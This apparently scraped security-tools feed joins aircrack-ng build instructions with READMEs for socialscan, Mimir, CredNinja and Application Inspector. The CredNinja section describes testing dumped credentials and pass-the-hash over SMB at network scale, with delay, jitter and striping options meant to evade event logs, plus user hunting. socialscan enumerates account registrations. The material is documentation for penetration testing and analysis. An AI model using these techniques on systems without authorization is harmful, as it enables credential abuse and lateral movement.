sudo apk add gcc g++ make autoconf automake libtool libnl3-dev openssl-dev ethtool libpcap-dev cmocka-dev hostapd wpa_supplicant tcpdump screen iw pkgconf util-linux sqlite-dev pcre-dev linux-headers zlib-dev

BSD

FreeBSD
pkg install pkgconf shtool libtool gcc9 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka

DragonflyBSD
pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 libgcrypt gmake cmocka

OpenBSD
pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka

OSX
XCode, Xcode command line tools and HomeBrew are required.
brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

Windows

Cygwin
Cygwin requires the full path to the setup.exe utility, in order to automate the installation of the necessary packages. In addition, it requires the location of your installation, a path to the cached packages download location, and a mirror URL.
An example of automatically installing all the dependencies is as follows:
c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P libssl-devel -P libsqlite3-devel

MSYS2
pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel

Compiling
To build aircrack-ng, the Autotools build system is utilized. Autotools replaces the older method of compilation.
NOTE: If utilizing a developer version, eg: one checked out from source control, you will need to run a pre-configure script. The script to use is one of the following: autoreconf -i or env NOCONFIGURE=1 ./autogen.sh.
First, ./configure the project for building with the appropriate options specified for your environment:
./configure <options>
TIP: If the above fails, please see above about developer source control versions.
Next, compile the project (respecting if make or gmake is needed):
  • Compilation:
    make
  • Compilation on *BSD or Solaris:
    gmake
Finally, the additional targets listed below may be of use in your environment:
  • Execute all unit testing:
    make check
  • Execute all integration testing (requires root):
    make integration
  • Installing:
    make install
  • Uninstall:
    make uninstall

./configure flags
When configuring, the following flags can be used and combined to adjust the suite to your choosing:
  • with-airpcap=DIR: needed for supporting airpcap devices on windows (cygwin or msys2 only) Replace DIR above with the absolute location to the root of the extracted source code from the Airpcap CD or downloaded SDK available online. Required on Windows to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools. The developer pack (Compatible with version 4.1.1 and 4.1.3) can be downloaded at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
  • with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler, airventriloquist and wesside-ng. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.
  • with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note: Each script has its own dependencies.
  • with-gcrypt: Use libgcrypt crypto library instead of the default OpenSSL. And also use internal fast sha1 implementation (borrowed from GIT) Dependency (Debian): libgcrypt20-dev
  • with-duma: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma
  • disable-libnl: Set-up the project to be compiled without libnl (1 or 3). Linux option only.
  • without-opt: Do not enable stack protector (on GCC 4.9 and above).
  • enable-shared: Make OSdep a shared library.
  • disable-shared: When combined with enable-static, it will statically compile Aircrack-ng.
  • with-avx512: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.
  • with-static-simd=: Compile a single optimization in aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization in the binary. --with-static-simd merely allows to choose another one.

Examples:
  • Configure and compiling:
    ./configure --with-experimental
    make
  • Compiling with gcrypt:
    ./configure --with-gcrypt
    make
  • Installing:
    make install
  • Installing (strip binaries):
    make install-strip
  • Installing, with external scripts:
    ./configure --with-experimental --with-ext-scripts
    make
    make install
  • Testing (with sqlite, experimental and pcre)
    ./configure --with-experimental
    make
    make check
  • Compiling on OS X with macports (and all options):
    ./configure --with-experimental
    gmake
  • Compiling on OS X 10.10 with XCode 7.1 and Homebrew:
    env CC=gcc-4.9 CXX=g++-4.9 ./configure
    make
    make check
    NOTE: Older XCode ships with a version of LLVM that does not support CPU feature detection; which causes the ./configure to fail. To work around this older LLVM, it is required that a different compile suite is used, such as GCC or a newer LLVM from Homebrew.
    If you wish to use OpenSSL from Homebrew, you may need to specify the location to its' installation. To figure out where OpenSSL lives, run:
    brew --prefix openssl
    Use the output above as the DIR for --with-openssl=DIR in the ./configure line:
    env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
    make
    make check
  • Compiling on FreeBSD with gcc9
    env CC=gcc9 CXX=g++9 MAKE=gmake ./configure
    gmake
  • Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in Aircrack-ng directory)
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
    dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
    autoreconf -i
    ./configure --with-experimental --with-airpcap=$(pwd)
    make
  • Compiling on DragonflyBSD with gcrypt using GCC 8
    autoreconf -i
    env CC=gcc8 CXX=g++8 MAKE=gmake ./configure --with-experimental --with-gcrypt
    gmake
  • Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)
    export AUTOCONF_VERSION=2.69
    export AUTOMAKE_VERSION=1.16
    autoreconf -i
    env MAKE=gmake ./configure
    gmake
  • Compiling and debugging aircrack-ng
    export CFLAGS='-O0 -g'
    export CXXFLAGS='-O0 -g'
    ./configure
    make
    LD_LIBRARY_PATH=.libs gdb --args ./aircrack-ng [PARAMETERS]

Packaging
Automatic detection of CPU optimization is done at run time. This behavior is desirable when packaging Aircrack-ng (for a Linux or other distribution.)
Also, in some cases it may be desired to provide your own flags completely and not having the suite auto-detect a number of optimizations. To do this, add the additional flag --without-opt to the ./configure line:
./configure --without-opt

Using precompiled binaries

Linux/BSD
  • Use your package manager to download aircrack-ng
  • In most cases, they have an old version.

Windows
  • Install the appropriate "monitor" driver for your card (standard drivers doesn't work for capturing data).
  • aircrack-ng suite is command line tools. So, you have to open a commandline Start menu -> Run... -> cmd.exe then use them
  • Run the executables without any parameters to have help

Documentation
Documentation, tutorials, ... can be found on https://aircrack-ng.org
See also manpages and the forum.
For further information check the README file


Socialscan - Check Email Address And Username Availability On Online Platforms With 100% Accuracy

$
0
0

socialscan offers accurate and fast checks for email address and username usage on online platforms.
Given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms.
Features that differentiate socialscan from similar tools (e.g. knowem.com, Namechk, and Sherlock):
  1. 100% accuracy: socialscan's query method eliminates the false positives and negatives that often occur in similar tools, ensuring that results are always accurate.
  2. Speed: socialscan uses asyncio along with aiohttp to conduct all queries concurrently, providing fast searches even with bulk queries involving hundreds of usernames and email addresses. On a test computer with average specs and Internet speed, 100 queries were executed in ~4 seconds.
  3. Library / CLI: socialscan can be executed through a CLI, or imported as a Python library to be used with existing code.
  4. Email support: socialscan supports queries for both email addresses and usernames.

The following platforms are currently supported:
UsernameEmail
Instagramyesyes
Twitteryesyes
GitHubyesyes
Tumblryesyes
Lastfmyesyes
Snapchatyes
GitLabyes
Reddityes
Yahooyes
Pinterestyes
Spotifyyes



Background
Other similar tools check username availability by requesting the profile page of the username in question and based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases:
  • Reserved keywords: Most platforms have a set of keywords that they don't allow to be used in usernames
    (A simple test: try checking reserved words like 'admin' or 'home' or 'root' and see if other services mark them as available)
  • Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist
Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses.
socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies.

Installation

pip
> pip install socialscan

Install from source
> git clone https://github.com/iojw/socialscan.git  
> cd socialscan
> pip install .

Usage
usage: socialscan [list of usernames/email addresses to check]

optional arguments:
-h, --help show this help message and exit
--platforms [platform [platform ...]], -p [platform [platform ...]]
list of platforms to query (default: all platforms)
--view-by {platform,query}
view results sorted by platform or by query (default:
query)
--available-only, -a only print usernames/email addresses that are
available and not in use
--cache-tokens, -c cache tokens for platforms requiring more than one
HTTP request (Snapchat, GitHub, Instagram. Lastfm &
Tumblr), reducing total number of requests sent
--input input.txt, -i input.txt
file containg list of queries to execute
--proxy-list proxy_list.txt
file containing list of HTTP proxy servers to execute
queries with
--verbose, -v show query responses as they are received
--version show program's version number and exit

As a library
socialscan can also be imported into existing code and used as a library.
v1.0.0 introduces the async method execute_queries and the corresponding synchronous wrappersync_execute_queries that takes a list of queries and optional list of platforms and proxies, executing all queries concurrently. The method then returns a list of results in the same order.
from socialscan.util import Platforms, sync_execute_queries

queries = ["username1", "email2@gmail.com", "mail42@me.com"]
platforms = [Platforms.GITHUB, Platforms.LASTFM]
results = sync_execute_queries(queries, platforms)
for result in results:
print(f"{result.query} on {result.platform}: {result.message} (Success: {result.success}, Valid: {result.valid}, Available: {result.available})")
Output:
username1 on GitHub: Username is already taken (Success: True, Valid: True, Available: False)
username1 on Lastfm: Sorry, this username isn't available. (Success: True, Valid: True, Available: False)
email2@gmail.com on GitHub: Available (Success: True, Valid: True, Available: True)
email2@gmail.com on Lastfm: Sorry, that email address is already registered to another account. (Success: True, Valid: True, Available: False)
mail42@me.com on GitHub: Available (Success: True, Valid: True, Available: True)
mail42@me.com on Lastfm: Looking good! (Success: True, Valid: True, Available: True)

Text file input
For bulk queries with the --input option, place one username/email on each line in the .txt file:
username1
email2@mail.com
username3


Mimir - Smart OSINT Collection Of Common IOC Types

$
0
0

Smart OSINT collection of common IOC types.

Overview
This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.
The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection
For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS

Collection Sources
Some of these sources will require an API key, and occassionally only by getting a paid account. I've tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks

Risk Scoring
The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions
The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output
Mimir offers results output in various options including local file reports or exporting the results to an external service.
  • stdout (console output)
    • normalizes result data, printed with headers and subheaders per module
  • JSON file
    • beautified output to local file
  • Excel
    • uses multiple sheets per IOC type
  • MISP
    • commit new indicators
  • ThreatConnect
    • commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)


CredNinja - A Multithreaded Tool Designed To Identify If Credentials Are Valid, Invalid, Or Local Admin Valid Credentials Within A Network At-Scale Via SMB, Plus Now With A User Hunter

$
0
0

This tool is intended for penetration testers who want to perform an engagement quickly and efficiently. While this tool can be used for more covert operations (including some additions below), it really shines when used at the scale of a large network.

At the core of it, you provide it a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (I suggest scanning for port 445 first, or you can use "--scan"). It will tell you if the credentials you dumped are valid on the domain, and if you have local administrator access to a host.

See below for additional features, like user hunting and host detail enumeration.

It is intended to be run on Kali Linux



.d8888b. 888 888b 888 d8b d8b
d88P Y88b 888 8888b 888 Y8P Y8P
888 888 888 88888b 888
888 888d888 .d88b. .d88888 888Y88b 888 888 88888b. 8888 8888b.
888 888P" d8P Y8b d88" 888 888 Y88b888 888 888 "88b "888 "88b
888 888 888 88888888 888 888 888 Y88888 888 888 888 888 .d888888
Y88b d88P 888 Y8b. Y88b 888 888 Y8888 888 888 888 888 888 888
"Y8888P" 888 "Y8888 "Y88888 888 Y888 888 888 888 888 "Y888888
888
d88P
888P"

v2.3 (Built 1/26/2018) - Chris King (@raikiasec)

For help: ./CredNinja.py -h

usage: CredNinja.py -a accounts_to_test.txt -s systems_to_test.txt
[-t THREADS] [--ntlm] [--valid] [--invalid] [-o OUTPUT]
[-p PASSDELIMITER] [--delay SECONDS %JITTER]
[--timeout TIMEOUT] [--stripe] [--scan]
[--scan-timeout SCAN_TIMEOUT] [-h] [--no-color] [--os]
[--domain] [--users] [--users-time USERS_TIME]

Quickly check the validity of multiple user credentials across multiple
servers and be notified if that user has local administrator rights on each
server.

Required Arguments:
-a accounts_to_test.txt, --accounts accounts_to_test.txt
A word or file of user credentials to test. Usernames
are accepted in the form of "DOMAIN\USERNAME:PASSWORD"
-s systems_to_test.txt, --servers systems_to_test.txt
A word or file of servers to test against. This can
be a single system, a filename containing a list of
systems, a gnmap file, or IP addresses in cidr notation.
Each credential will be tested against each of these
servers by attempting to browse C$ via SMB

Optional Arguments:
-t THREADS, --threads THREADS
Number of threads to use. Defaults to 10
--ntlm Treat the passwords as NTLM hashes and attempt to
pass-the-hash!
--valid Only print valid/local admin credentials
--invalid Only print invalid credentials
-o OUTPUT, --output OUTPUT
Print results to a file
-p PASSDELIMITER, --passdelimiter PASSDELIMITER
Change the delimiter between the account username and
password. Defaults to ":"
--delay SECONDS %JITTER
Delay each request per thread by specified seconds
with jitter (example: --delay 20 10, 20 second delay
with 10% jitter)
--timeout TIMEOUT Amount of seconds wait for data before timing out.
Default is 15 seconds
--stripe Only test one credential on one host to avoid spamming
a single system with multiple login attempts (used to
check validity of credentials). This will randomly
select hosts from the provided host file.
--scan Perform a quick check to see port 445 is available on
the host before queueing it up to be processed
--scan-timeout SCAN_TIMEOUT
Sets the timeout for the scan specified by --scan
argument. Default of 2 seconds
-h, --help Get help about this script's usage
--no-color Turns off output color. Written file is always
colorless

Additional Information Retrieval:
--os Display the OS of the system if available (no extra
request is being sent)
--domain Display the primary domain of the system if available
(no extra request is being sent)
--users List the users that have logged in to the system in
the last 6 months (requires LOCAL ADMIN). Returns
usernames with the number of days since their home
directory was changed. This sends one extra request to
each host
--users-time USERS_TIME
Modifies --users to search for users that have logged
in within the last supplied amount of days (default
100 days)


Changelog:

v2.3 - Updated with some additional features
  • Added gnmap file parsing.  The file provided to the --systems (-s) argument can now be a gnmap file (ending in .gnmap)
  • Added cidr notation parsing. The IP address provided to the --systems (-s)  argument can now be in cidr notation and it will properly expand the range and test all systems within the ip space (make sure you provide --scan to  scan the systems ahead of time!)
  • Made --scan multithreaded so it runs MUCH faster

v2.0 - Initial release of CredNinja from the predecessor CredSwissArmy:
  • Same ability as the previous CredSwissArmy (using credentials and host list to search for Local Admin access across a network via SMB)
  • Fully multithreaded!  It is 8x the speed of the old CredSwissArmy!
  • Handles errors and complex passwords much better
  • Can still pass-the-hash with the "--ntlm" option
  • Still has the same arguments as before
  • Added "--timeout", which allows scans to get done faster if you wish
  • Added "--scan", which runs a quick port 445 scan of the hosts to make sure they are connectable before trying creds on them
  • Added "--stripe", which tests each credential once across a random system  (used to validate credentials without appearing suspicious in one systems' event log)
  • Added "--delay", which allows you to specify a delay between scanning hosts  to be more covert.  "--delay 10 20" will delay for 10 seconds with a 20% jitter (so between 8-10 seconds)
  • Added color output so its more obvious when you get success!

AND NOW THE COOL ADDITIONS

Added "--os", which shows the operating system of each system that it can fingerprint (no additional packet is sent to target host)
Added "--domain", which shows the primary domain the system is a member of (no additional packet is sent to the target host)
Added "--users", which shows a list of users' whose home directories have been modified in X amount of days (X is modifiable by "--users-days", default of 100). Basically an SMB User-Hunter that shows where users are logged in to or have been logged in to  (1 additional packet is sent to each target host)
Coming soon: Anti-virus detector to give notice to potential antivirus running on the system


ApplicationInspector - A Source Code Analyzer Built For Surfacing Features Of Interest And Other Characteristics To Answer The Question 'What'S In It' Using Static Analysis With A Json Based Rules Engine

$
0
0
Microsoft Application Inspector is a software source code analysis tool that helps identify and surface well-known features and other interesting characteristics of source code to aid in determining what the software is or what it does.
Application Inspector is different from traditional static analysis tools in that it doesn't attempt to identify "good" or "bad" patterns; it simply reports what it finds against a set of over 400 rule patterns for feature detection including features that impact security such as the use of cryptography and more. This can be extremely helpful in reducing the time needed to determine what Open Source or other components do by examining the source directly rather than trusting to limited documentation or recommendations.
The tool includes several output formats with the default being an html report similar to the one shown here.


It includes a filterable confidence indicator to help minimize false positives matches as well as customizable default rules and conditional match logic.
Be sure to see our project wiki page for more help https://Github.com/Microsoft/ApplicationInspector/wiki for illustrations and additional information and help.

Goals
Application Inspector helps inform you better for choosing the best components to meet your needs with a smaller footprint of unknowns for keeping your application attack surface smaller. It helps you to avoid inclusion of components with unexpected features you don't want.
Application Inspector can help identify feature deltas or changes between component versions which can be critical for detecting injection of backdoors.
It can be used to automate detection of features of interest to identify components that require additional scrutiny as part of your build pipeline or create a repository of metadata regarding all of your enterprise application.
Basically, we created Application Inspector to help us identify risky third party software components based on their specific features, but the tool is helpful in many non-security contexts as well.
Application Inspector v1.0 is now in GENERAL AUDIENCE release status. Your feedback is important to us. If you're interested in contributing, please review the CONTRIBUTING.md.

Contribute
We have a strong default starting base of Rules for feature detection. But there are many feature identification patterns yet to be defined and we invite you to submit ideas on what you want to see or take a crack at defining a few. This is a chance to literally impact the open source ecosystem helping provide a tool that everyone can use. See the Rules section of the wiki for more.

Getting Application Inspector
To use Application Inspector, download the relevant binary (either platform-specific or the multi-platform .NET Core release). If you use the .NET Core version, you will need to have .NET Core 3.0 or later installed.
It might be valuable to consult the project wiki for additional background on Rules, Tags and more used to identify features. Tags are used as a systematic heirarchal nomenclature e.g. Cryptography.Protocol.TLS to more easily represent features.

Usage
Application Inspector is a command-line tool. Run it from a command line in Windows, Linux, or MacOS.
> dotnet AppInspector.dll or on *Windows* simply AppInspector.exe <command> <options>

Microsoft Application Inspector 1.0.17
ApplicationInspector 1.0.17

(c) Microsoft Corporation. All rights reserved

ERROR(S):
No verb selected.

analyze Inspect source directory/file/compressed file (.tgz|zip) against defined characteristics
tagdiff Compares unique tag values between two source paths
tagtest Test presence of smaller set or custom tags in source (compare or verify modes)
exporttags Export default unique rule tags to view what features may be detected
verifyrules Verify rules syntax is valid
help Display more information on a specific command
version Display version information

Examples:

Command Help
  Usage: dotnet AppInspector.dll [arguments] [options]

dotnet AppInspector.dll -description of available commands
dotnet AppInspector.dll <command> -options description for a given command

Analyze Command
  Usage: dotnet AppInspector.dll analyze [arguments] [options]

Arguments:
-s, --source-path Required. Path to source code to inspect (required)
-o, --output-file-path Path to output file. Ignored with -f html option which auto creates output.html
-f, --output-file-format (Default: html) Output format [html|json|text]
-e, --text-format (Default: Tag:%T,Rule:%N,Ruleid:%R,Confidence:%X,File:%F,Sourcetype:%t,Line:%L,Sample:%m)
-r, --custom-rules-path Custom rules path
-t, --tag-output-only (Default: false) Output only contains identified tags
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-d, --allow-dup-tags (Default: false) Output only contains non-unique tag matches
-c, --confidence-filters (Default: high,medium) Output only if matches rule pattern confidence [<value>,] [high|medium|low]
-k, --include-sample-paths (Default: false) Include source files with (sample,example,test,.vs,.git) in pathname in analysis
-x, --console-verbosity (Default: medium) Console verbosity [high|medium|low|none]
-l, --log-file-path Log file path
-v, --log-file-level (Default: Error) Log file level [Debug|Info|Warn|Error|Fatal|Off]

Scan a project directory, with output sent to "output.html" (default behavior includes launching default browser to this file)
  dotnet AppInspector.dll analyze -s /home/user/myproject 

Add custom rules (can be specified multiple times)
  dotnet AppInspector.dll analyze -s /home/user/myproject -r /my/rules/directory -r /my/other/rules

Write to JSON format
  dotnet AppInspector.dll analyze -s /home/user/myproject -f json

Tagdiff Command
Use to analyze and report on differences in tags (features) between two project or project versions e.g. v1, v2 to see what changed
  Usage: dotnet AppInspector.dll tagdiff [arguments] [options]

Arguments:
--src1 Required. Source 1 to compare (required)
--src2 Required. Source 2 to compare (required
-t, --test-type (Default: equality) Type of test to run [equality|inequality]
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low
-l, --log-file-path Log file path
-v, --log-file-level Log file level [error|trace|debug|info]

Simplist way to see the delta in tag features between two projects
  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2

Basic use
  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t equality

Basic use
  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t inequality

TagTest Command
Used to verify (pass/fail) that a specified set of rule tags is present or not present in a project e.g. user only wants to know true/false if crytography is present as expected or if personal data is not present as expected and get a simple yes/no result rather than a full analyis report.
Note: The user is expected to use the custom-rules-path option rather than the default ruleset because it is unlikely that any source package would contain all of the default rules. Instead, create a custom path and rule set as needed or specify a path using the custom-rules-path to point only to the rule(s) needed from the default set.
Otherwise, testing for all default rules present in source will likely yield a false or fail result in most cases.
  Usage: dotnet AppInspector.dll tagtest [arguments] [options

Arguments:
-s, --source-path Required. Source to test (required)
-t, --test-type (Default: rulespresent) Test to perform [rulespresent|rulesnotpresent]
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: true) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low
-l, --log-file-path Log file path
-v, --log-file-level Log file level

Simplest use to see if a set of rules are all present in a project
  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json

Basic use
  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulespresent

Basic use
  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulesnotpresent

ExportTags Command
Simple export of the ruleset schema for tags representing what features are supported for detection
  Usage: dotnet AppInspector.dll exporttags [arguments] [options]

Arguments:
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low

Export default rule tags to console
  dotnet AppInspector.dll exporttags

Using output file
  dotnet AppInspector.dll exporttags -o /home/user/myproject/exportags.txt

With custom rules and output file
  dotnet AppInspector.dll exporttags -r /home/user/myproject/customrules -o /hom/user/myproject/exportags.txt

Verify Command
Verification that ruleset is compatible and error free for import and analysis
  Usage: dotnet AppInspector.dll verifyrules [arguments]

Arguments:
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low

Simplist case to verify default rules
  dotnet AppInspector.dll verifyrules

Using custom rules only
  dotnet AppInspector.dll verifyrules -r /home/user/myproject/customrules -i

Build Instructions
Building from source requires .NET Core 3.0. Standard dotnet build commands can be run from the root source folder.

Framework Dependent
  dotnet build -c Release

Platform Targeted Portable
  dotnet publish -c Release -r win-x86
dotnet publish -c Release -r linux-x64
dotnet publish -c Release -r osx-x64


Viewing all 5841 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>